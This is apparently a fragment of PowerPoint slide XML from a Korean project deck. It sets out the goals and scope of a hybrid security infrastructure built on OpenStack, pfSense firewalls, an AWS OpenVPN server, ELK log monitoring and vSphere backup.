                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>불가</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="굴림"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2079" name="그림 207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13972" y="1508303"/>
            <a:ext cx="3980576" cy="3058146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2080" name="오른쪽 화살표 2079"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7528047" y="2809875"/>
            <a:ext cx="438299" cy="6191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82" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8296123" y="4845339"/>
            <a:ext cx="3895877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2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차 인증까지 통과 후 </a:t>
            </a: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OPENSTACK HORIZON</a:t>
            </a:r>
          </a:p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로그인 페이지 접속</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2083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058607" y="4862943"/>
            <a:ext cx="178905" cy="1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1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571500" y="838505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통합 보안 인프라 구축 프로젝트의 방향성 정의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71500" y="1257300"/>
            <a:ext cx="571500" cy="3840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571500" y="1752905"/>
            <a:ext cx="5296205" cy="1377697"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2268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t="-43" b="-43"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="1943479"/>
            <a:ext cx="133502" cy="152705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809244" y="2338544"/>
            <a:ext cx="4934102" cy="743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ko-KR" alt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사내 공통 네트워크와 내부 관리자 네트워크를 분리한 하이브리드 보안 인프라를 설계</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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구현하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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·VPN·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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중앙 로그 관제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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백업 구조를 통해 실제 운영 환경에서의 접근 통제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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관제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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복구 가능성을 검증한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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56745" y="3372962"/>
            <a:ext cx="5296205" cy="3360679"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 328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23544" y="3618449"/>
            <a:ext cx="152705" cy="152705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961949" y="4026271"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="3968664"/>
            <a:ext cx="2981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OpenStack 기반 온프레미스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190548" y="4197264"/>
            <a:ext cx="3207421" cy="377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 관리자 네트워크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(172.16.0.0/24) </a:t>
            </a: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상에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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OpenStack </a:t>
            </a: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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Compute, Network, Storage 구성 및 서비스 배포</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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961949" y="4700771"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="4643164"/>
            <a:ext cx="2791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pfSense 보안 게이트웨이</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="4871764"/>
            <a:ext cx="3674619" cy="32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사내 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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공통망</a:t>
            </a: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↔ 내부 관리자망 경계 방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(pfSense-1) </a:t>
            </a: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구성내부 관리자망 ↔ 서버 존 내부 분리 방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(pfSense-2) </a:t>
            </a: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구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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961949" y="5386844"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="5330152"/>
            <a:ext cx="2686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AWS 하이브리드 확장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="5558752"/>
            <a:ext cx="26718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altLang="ko-KR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AWS EC2 </a:t>
            </a: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기반 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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OpenVPN Server </a:t>
            </a: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구축외부 관리자 접근을 위한 원격 접속 거점 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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961949" y="6082031"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="6024424"/>
            <a:ext cx="27532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ELK 보안 관제 &amp; vSphere 백업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190549" y="6253024"/>
            <a:ext cx="3207420" cy="32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altLang="ko-KR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OpenStack </a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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AWS </a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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네트워크 로그 중앙 수집</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10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통합</a:t>
            </a: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로그 수집, 대시보드 시각화 및 시스템 백업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3200400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목표와 범위</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="1922448"/>
            <a:ext cx="12481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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="3582177"/>
            <a:ext cx="16669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 범위 (Scope)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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7C2E719-2785-FF00-1A7F-943B476279CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6324905" y="1752905"/>
            <a:ext cx="5310350" cy="1550121"/>
            <a:chOff x="6324905" y="1752905"/>
            <a:chExt cx="5296204" cy="1904695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Shape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324905" y="1752905"/>
              <a:ext cx="2572207" cy="875995"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9077"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429146" y="2238451"/>
              <a:ext cx="236281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네트워크 조직도</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9048902" y="1752905"/>
              <a:ext cx="2572207" cy="875995"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9077"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9153144" y="2238451"/>
              <a:ext cx="236281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구성 문서</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324905" y="2781605"/>
              <a:ext cx="2572207" cy="875995"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9077"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429146" y="3267151"/>
              <a:ext cx="236281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보안 정책서</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9048902" y="2781605"/>
              <a:ext cx="2572207" cy="875995"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9077"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9153144" y="3267151"/>
              <a:ext cx="236281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공격/탐지 로그</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="61" name="Image 9" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:srcRect t="-45" b="-45"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7481621" y="1914754"/>
              <a:ext cx="256946" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="62" name="Image 10" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:srcRect l="-133" r="-133"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10248595" y="1914754"/>
              <a:ext cx="171907" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="63" name="Image 11" descr="preencoded.png"/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496251" y="2943454"/>
              <a:ext cx="228600" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="64" name="Image 12" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect t="-45" b="-45"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10205618" y="2943454"/>
              <a:ext cx="256946" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324447" y="3446321"/>
            <a:ext cx="5310808" cy="3298895"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 351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6F145CA-1811-B2B4-0CD6-2857D5767A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6563306" y="3591445"/>
            <a:ext cx="4841344" cy="2980010"/>
            <a:chOff x="6563306" y="3537133"/>
            <a:chExt cx="4841344" cy="2464139"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="3816220"/>
              <a:ext cx="1451486" cy="324138"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4126146"/>
              <a:ext cx="1451486" cy="14210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Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8015544" y="3816218"/>
              <a:ext cx="1699972" cy="324138"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8012958" y="4126146"/>
              <a:ext cx="1699972" cy="14210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Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704678" y="3816220"/>
              <a:ext cx="1699972" cy="324138"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704678" y="4126146"/>
              <a:ext cx="1699972" cy="14210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Shape 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4140357"/>
              <a:ext cx="1451486" cy="317371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Shape 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4450961"/>
              <a:ext cx="1451486" cy="6767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Shape 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8012958" y="4450961"/>
              <a:ext cx="1699972" cy="6767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Shape 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704678" y="4450961"/>
              <a:ext cx="1699972" cy="6767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Shape 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4457728"/>
              <a:ext cx="1451486" cy="458124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Shape 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4909084"/>
              <a:ext cx="1451486" cy="6767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Shape 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8012958" y="4909084"/>
              <a:ext cx="1699972" cy="6767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Shape 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704678" y="4909084"/>
              <a:ext cx="1699972" cy="6767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Shape 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="4915851"/>
              <a:ext cx="1451486" cy="458124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Shape 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="5367207"/>
              <a:ext cx="1451486" cy="6767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Shape 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8012958" y="5367207"/>
              <a:ext cx="1699972" cy="6767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Shape 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704678" y="5367207"/>
              <a:ext cx="1699972" cy="6767"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="334155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Shape 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="5373974"/>
              <a:ext cx="1451486" cy="451357"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="4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Shape 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="5994505"/>
              <a:ext cx="4833091" cy="6767"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E5E7EB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 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6563306" y="3537133"/>
              <a:ext cx="1309363" cy="2050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범위 상세 정의</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Text 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677921" y="3900807"/>
              <a:ext cx="349347" cy="1414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b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE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구분</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Text 52"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8127573" y="3900807"/>
              <a:ext cx="1065463" cy="1414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b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE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In-Scope (포함)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819293" y="3900807"/>
              <a:ext cx="1361628" cy="1414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b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE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Out-of-Scope (제외)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Text 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677921" y="4224944"/>
              <a:ext cx="473131" cy="1414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b="1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인프라</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Text 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8127573" y="4224944"/>
              <a:ext cx="1466157" cy="1414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OpenStack, AWS(EC2)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Text 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819293" y="4224944"/>
              <a:ext cx="1199333" cy="1414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물리적 서버 랙 설치</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Text 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677921" y="4612691"/>
              <a:ext cx="349347" cy="1414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b="1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보안</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Text 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8127573" y="4542315"/>
              <a:ext cx="1208502" cy="2821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FW, IDS, VPN</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Text 59"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819293" y="4542315"/>
              <a:ext cx="1361628" cy="2821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</a:rPr>
                <a:t>IPS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Text 60"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677921" y="5070814"/>
              <a:ext cx="349347" cy="1414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b="1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관제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Text 61"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8127573" y="5000438"/>
              <a:ext cx="1552347" cy="2821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System/App/Net Log 통합</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Text 62"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819293" y="5000438"/>
              <a:ext cx="1447819" cy="2821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머신러닝 기반 이상 탐지(AI)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Text 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677921" y="5528938"/>
              <a:ext cx="349347" cy="1414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b="1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검증</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
